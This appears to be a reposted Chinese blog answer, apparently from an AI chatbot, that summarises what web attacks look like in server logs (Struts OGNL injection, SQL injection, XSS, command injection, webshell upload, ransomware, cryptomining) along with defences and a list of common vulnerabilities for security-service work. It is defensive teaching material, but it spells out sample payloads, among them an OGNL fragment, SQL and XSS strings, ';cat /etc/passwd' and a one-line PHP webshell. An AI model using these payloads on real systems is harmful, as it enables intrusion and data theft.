典型网络攻击日志分析案例汇总
日志中显示了一个POST请求,使用了过时的User-Agent(Mozilla/4.0),Content-Type为multipart/form-data,并注入OGNL表达式如。我优先选择了高质量的总结性资源(如奇安信的应急响应案例集、FreeBuf的分析文章),并聚焦于Web攻击日志的样子。此外,推荐阅读奇安信的《网络安全应急响应典型案例集》(2021版),包含50+案例,如篡改类攻击通过SQ
典型网络攻击日志分析案例汇总
基于您上传的截图日志,这看起来像是Apache Struts框架的OGNL表达式注入攻击(常见于CVE-2017-5638或类似漏洞)。日志中显示了一个POST请求,使用了过时的User-Agent(Mozilla/4.0),Content-Type为multipart/form-data,并注入OGNL表达式如#ognlUtil.getExcludedPackageNames.clear()等,目的是绕过成员访问限制并执行任意代码。这类攻击通常旨在远程代码执行(RCE),如植入Web壳或窃取数据。下面我根据您的要求,汇总了一些典型日志分析案例和主流网络攻击手法的日志特征。这些信息来源于网络搜索和X平台上的相关总结帖子,我已归纳整理,便于您通过案例学习。
我优先选择了高质量的总结性资源(如奇安信的应急响应案例集、FreeBuf的分析文章),并聚焦于Web攻击日志的样子。主流攻击手法包括SQL注入、XSS、命令注入、勒索病毒等,我用表格形式呈现每个手法的典型日志特征、攻击意图和防御建议。如果是真实环境,建议结合SIEM工具(如Splunk)进行日志监控。
主流网络攻击手法的日志样子汇总
以下是当前常见Web和网络攻击的日志示例(基于Apache/Nginx等服务器日志格式)。这些是高水平概述,不是可操作细节。日志通常包括时间戳、IP、请求方法、User-Agent、状态码等。
| 攻击手法 | 典型日志样子示例 | 攻击意图 | 防御建议 |
|---|---|---|---|
| OGNL注入(Apache Struts漏洞,如CVE-2017-5638) | POST /user/login.do HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Content-Type: multipart/form-data; boundary=----... Content: %{(#ognlUtil=#rt.getUtil('ognl.OgnlUtil')).(#ognlUtil.getExcludedPackageNames.clear()).(#ognlUtil.getExcludedClasses.clear())...} 状态码:200或500,伴随异常日志如"OGNL evaluation error"。 |
通过OGNL表达式注入执行任意命令,如清空排除列表后运行系统命令(echo、cmd等),常用于RCE或数据窃取。 | 升级Struts到2.5.26+,禁用强制OGNL评估,避免用户输入直接传入%{…}语法。使用WAF过滤异常Content-Type。 |
| SQL注入 | GET /search?q=1' OR '1'='1 HTTP/1.1 User-Agent: Mozilla/5.0... Referer: malicious-site.com 错误日志: SQL syntax error near '1' OR '1'='1' 或数据库dump如UNION SELECT user,pass FROM users。 |
注入SQL代码绕过认证或提取数据库(如管理员密码)。常见于Web表单。 | 使用参数化查询(Prepared Statements),输入 sanitization。日志监控异常SQL关键词如UNION、DROP。 |
| XSS(跨站脚本) | GET /comment?text=<script>alert('xss')</script> HTTP/1.1 User-Agent: Mozilla/5.0... 访问日志显示嵌入标签如 <script>、<iframe> 或事件处理器如onload=。后续日志可能见cookie窃取请求。 |
注入JS脚本窃取cookie或重定向用户。常见于评论区或搜索框。 | 输出编码(HTML实体转义),启用CSP头。日志扫描JS关键词如script、alert。 |
| 命令注入 | POST /exec?cmd=ping -c 1 evil.com HTTP/1.1 Content: ;cat /etc/passwd 或 & ipconfig 系统日志:异常进程如 cmd.exe /c dir 或网络流量到C2服务器。 |
通过;、&等分隔符注入系统命令,执行任意shell(如下载恶意文件)。 | 严格输入过滤,禁止shell元字符。使用白名单命令执行。 |
| 勒索病毒(如Ransomware) | 初始日志:GET /malware.exe HTTP/1.1 从可疑IP。 进程日志:高CPU使用,文件加密如 .locky扩展。 网络日志:数据外发到C2,如 POST /exfil data encrypted。 示例从案例:受害服务器日志显示PowerShell执行下载器。 |
加密文件后索要赎金。常通过永恒之蓝(MS17-010)传播。 | 打补丁,备份数据。日志监控异常文件操作和PowerShell调用。 |
| 挖矿病毒(Cryptojacking) | POST /miner.js HTTP/1.1 高CPU进程日志: powershell.exe -ExecutionPolicy Bypass -File miner.ps1 网络日志:连接矿池如 stratum+tcp://pool.evil.com。 示例:永恒之蓝下载器传播,日志见SMB弱口令爆破。 |
利用受害机计算资源挖币。常伪装成正常进程。 | 监控CPU异常,禁用不必要端口(445等)。日志分析PowerShell和网络流量。 |
| APT攻击(高级持续威胁) | 初始:钓鱼邮件日志如GET /phish.doc HTTP/1.1。 横向移动:异常内部流量如 SMB连接到内网主机。 数据外发: POST /c2server data。 示例:海莲花APT通过0day和社会工程学,日志见水坑攻击或沙箱逃逸。 |
长期潜伏窃取情报。针对特定目标,多阶段攻击链。 | 多层防御,日志关联分析(SIEM)。定期渗透测试。 |
| 拒绝服务(DoS/DDoS) | 洪水日志:大量SYN包从多个IP,如TCP SYN flood from x.x.x.x。 应用层:重复 GET /largefile 请求导致高负载。 |
耗尽资源使服务不可用。 | 使用CDN、WAF限流。日志监控流量峰值和异常模式。 |
| 文件上传漏洞 | POST /upload.php HTTP/1.1 Content-Type: multipart/form-data 文件名: shell.php 伪装为图片,但内容含<?php system($_GET['cmd']); ?>。 |
上传Web壳后执行命令。 | 验证文件类型和内容,限制上传目录权限。 |
此外,推荐阅读奇安信的《网络安全应急响应典型案例集》(2021版),包含50+案例,如篡改类攻击通过SQL注入获取后台密码,日志分析重点是境外IP和异常查询。 FreeBuf的文章也总结了勒索病毒日志,如员工下载破解软件导致感染。
归纳学习建议
- 日志分析流程:先收集(access_log、error_log、system_log),然后过滤异常(如高频IP、异常UA、关键词如script/union/cmd)。使用工具如ELK Stack归纳模式。
- 常见模式:攻击日志常有伪造UA、异常参数、状态码异常(404/500)。主流攻击从简单注入到复杂APT,2023-2026年趋势是RaaS(勒索即服务)和LOTL。
- 防御重点:假设好意,这是学习防御;更新补丁、输入验证、日志审计。避免道德化,专注于技术。
Top 10 常见高频漏洞(安服仔天天打交道的)
- 弱口令 / 默认口令 / 暴力破解(频率最高,占比30-40%)
- RDP/SSH/数据库/MySQL/Redis/管理后台弱口令
- 等保测评一票否决项,几乎所有项目都有
- 安服日常:爆破测试、改策略、强制复杂口令+双因素
- SQL注入(经典永不过时,2025年仍排前三)
- 登录框、搜索框、URL参数注入
- 成功后dump数据库、绕过登录、webshell
- 安服处理:参数化查询、WAF规则、输入过滤
- 任意文件上传 / 文件包含(RCE神器)
- 图片伪装webshell、冰蝎/蚁剑上传
- 常见于CMS/OA/自定义上传接口
- 勒索软件传播重灾区(Weaxor等家族爱用)
- XSS(跨站脚本)(客户端攻击王者)
- 存储型/反射型/reflected DOM XSS
- 2025年十大Web高危榜单常客
- 安服测评:输出编码、CSP头、输入过滤
- 命令注入 / OS命令执行(RCE直达)
- ping、system()、exec()未过滤
- 成功后whoami、反弹shell
- 安服:输入白名单、参数化执行
- 未授权访问 / 越权(逻辑漏洞大户)
- 直接访问 /admin、订单ID改成别人、越权查看/修改
- 等保三级常见不符合项
- 敏感信息泄露(配置问题)
- phpinfo()、.git/、备份文件(.bak/.sql)、错误页面报错栈
- 响应头Server/X-Powered-By泄露框架版本
- 安服:关闭调试、隐藏Banner、404自定义
- 高危端口暴露(两高一弱之一)
- 3389(RDP)、22(SSH)、3306(MySQL)、6379(Redis)、1433(SQL Server)
- 未加白名单/公网暴露 → 弱口令+勒索
- 未加密传输 / HTTP明文(传输层老问题)
- 登录/敏感接口走HTTP、未强制HTTPS
- 等保要求三级必须加密传输
- CSRF / SSRF(中高危常客)
- CSRF:转账/改密码无token
- SSRF:内网探测、云元数据窃取
安服项目真实分布(2025-2026行情)
- 等保测评/合规项目(占安服业务60%+):弱口令、高危端口、未加密传输、未做双因素、漏洞未及时修复(高危15天内必须闭环)、渗透测试覆盖不足、日志审计缺失
- 渗透/红队/HW项目:文件上传 → webshell → 命令执行 → 横向 → 勒索/数据窃取链条
- 勒索应急响应:Web漏洞利用(文件上传/命令注入)+ RDP/数据库弱口令 是传播主因(Weaxor、LockBit等家族)
安服仔日常处理节奏
- 每天:用Xray/AWVS/Appscan扫一遍 → 人工验证高危 → 写报告/整改建议
- 每周:客户驻点改弱口令、关端口、补WAF规则、测双因素
- 每月:复测漏洞是否闭环、写等保不符合项整改报告
一句话:弱口令 + SQL注入 + 文件上传 + 高危端口暴露 这四个是安服仔的“四大天王”,项目里几乎必中,处理量最大,客户最头疼,也最容易出安全事件。
如果你目标是安服方向,先练好这几个的流量特征 + 日志关键字 + 修复方案,面试/实战直接加分。想针对哪个漏洞要详细的“怎么扫、怎么判成功、怎么整改”例子?告诉我我继续展开!
有“AI”的1024 = 2048,欢迎大家加入2048 AI社区
更多推荐
12
0- 0
已为社区贡献2条内容
所有评论(0)